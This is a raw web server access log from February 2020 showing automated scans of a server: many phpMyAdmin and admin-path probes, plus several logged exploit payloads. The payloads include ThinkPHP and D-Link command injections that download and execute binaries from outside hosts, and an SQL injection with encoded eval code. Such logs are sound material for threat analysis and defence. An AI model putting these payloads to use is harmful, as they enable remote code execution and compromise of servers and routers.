42.119.75.67 - - [04/Feb/2020:18:12:59 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
106.13.88.214 - - [04/Feb/2020:18:13:11 +0100] "POST /w.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
151.20.76.234 - - [04/Feb/2020:18:13:24 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
106.13.88.214 - - [04/Feb/2020:18:13:35 +0100] "POST /sheep.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [04/Feb/2020:18:13:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:14:03 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 346 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
106.13.88.214 - - [04/Feb/2020:18:14:03 +0100] "GET /weaver/bsh.servlet.BshServlet HTTP/1.1" 404 334 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
106.13.88.214 - - [04/Feb/2020:18:14:07 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
106.13.88.214 - - [04/Feb/2020:18:14:07 +0100] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
106.13.88.214 - - [04/Feb/2020:18:14:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [04/Feb/2020:18:14:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:15:03 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
106.13.88.214 - - [04/Feb/2020:18:15:35 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [04/Feb/2020:18:15:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.175.253.10 - - [04/Feb/2020:18:16:03 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
106.13.88.214 - - [04/Feb/2020:18:16:03 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
106.13.88.214 - - [04/Feb/2020:18:16:27 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [04/Feb/2020:18:16:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:16:55 +0100] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.1" 404 313 "45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:\"num\";s:147:\"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\";s:2:\"id\";s:9:\"' union/*\";s:4:\"name\";s:3:\"ads\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
106.13.88.214 - - [04/Feb/2020:18:16:55 +0100] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:16:55 +0100] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:16:56 +0100] "GET /phpMyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:16:56 +0100] "GET /pmd/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:16:57 +0100] "GET /pma/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:16:57 +0100] "GET /PMA/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:16:57 +0100] "GET /PMA2/index.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:16:59 +0100] "GET /pmamy/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:00 +0100] "GET /pmamy2/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:00 +0100] "GET /mysql/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:00 +0100] "GET /admin/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:01 +0100] "GET /db/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:01 +0100] "GET /dbadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:03 +0100] "GET /web/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:03 +0100] "GET /admin/pma/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:03 +0100] "GET /admin/PMA/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:03 +0100] "GET /admin/mysql/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:04 +0100] "GET /admin/mysql2/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:04 +0100] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:07 +0100] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:18 +0100] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:39 +0100] "GET /mysqladmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:39 +0100] "GET /mysql-admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:40 +0100] "GET /mysql_admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
212.91.246.72 - - [04/Feb/2020:18:17:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:17:43 +0100] "GET /phpadmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:43 +0100] "GET /phpAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:43 +0100] "GET /phpmyadmin0/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:47 +0100] "GET /phpmyadmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
46.109.121.23 - - [04/Feb/2020:18:17:55 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
106.13.88.214 - - [04/Feb/2020:18:17:59 +0100] "GET /phpmyadmin2/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:17:59 +0100] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:03 +0100] "GET /phpMyAdmin4.8.0/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:03 +0100] "GET /phpMyAdmin4.8.1/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:03 +0100] "GET /phpMyAdmin4.8.2/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:03 +0100] "GET /phpMyAdmin4.8.3/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:04 +0100] "GET /phpMyAdmin4.8.4/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:04 +0100] "GET /phpMyAdmin4.8.5/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:06 +0100] "GET /myadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:07 +0100] "GET /myadmin2/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:17 +0100] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:35 +0100] "GET /phpMyadmin_bak/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:36 +0100] "GET /www/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
212.91.246.72 - - [04/Feb/2020:18:18:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.163.5.85 - - [04/Feb/2020:18:18:44 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
106.13.88.214 - - [04/Feb/2020:18:18:59 +0100] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:59 +0100] "GET /phpmyadmin-old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:18:59 +0100] "GET /phpMyAdminold/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:03 +0100] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:03 +0100] "GET /pma-old/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:04 +0100] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:07 +0100] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:07 +0100] "GET /phpma/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:11 +0100] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:11 +0100] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:15 +0100] "GET /phpMyAbmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:19 +0100] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:19 +0100] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:19 +0100] "GET /v/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:23 +0100] "GET /phpmyadm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:23 +0100] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:23 +0100] "GET /shaAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:23 +0100] "GET /phpMyadmi/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:24 +0100] "GET /phpMyAdmion/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:24 +0100] "GET /s/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:24 +0100] "GET /MyAdmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:25 +0100] "GET /phpMyAdmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:27 +0100] "GET /phpMyAdmin123/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:28 +0100] "GET /pwd/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:28 +0100] "GET /phpMyAdmina/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:28 +0100] "GET /phpMydmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:28 +0100] "GET /phpMyAdmins/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:29 +0100] "GET /phpMyAdmin._/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:29 +0100] "GET /phpMyAdmin._2/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:31 +0100] "GET /phpmyadmin2222/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:31 +0100] "GET /phpMyAdmin333/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:31 +0100] "GET /phpmyadmin3333/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:31 +0100] "GET /php2MyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:32 +0100] "GET /phpiMyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:32 +0100] "GET /phpNyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:32 +0100] "GET /1/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:32 +0100] "GET /download/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:32 +0100] "GET /phpMyAdmin_111/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:33 +0100] "GET /phpmadmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:35 +0100] "GET /321/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:35 +0100] "GET /123131/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:35 +0100] "GET /phpMyAdminn/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:35 +0100] "GET /phpMyAdminhf/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:36 +0100] "GET /sbb/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:36 +0100] "GET /WWW/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:36 +0100] "GET /phpMyAdmln/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:39 +0100] "GET /phpMyAdmin_ai/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:40 +0100] "GET /__phpMyAdmin/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:40 +0100] "GET /program/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
212.91.246.72 - - [04/Feb/2020:18:19:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:19:43 +0100] "GET /shopdb/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:43 +0100] "GET /phppma/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:43 +0100] "GET /phpmy/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:43 +0100] "GET /mysql/admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:44 +0100] "GET /mysql/dbadmin/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:44 +0100] "GET /mysql/sqlmanager/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:44 +0100] "GET /mysql/mysqlmanager/index.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:44 +0100] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:44 +0100] "GET /sqladmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:47 +0100] "GET /sql/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:48 +0100] "GET /SQL/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
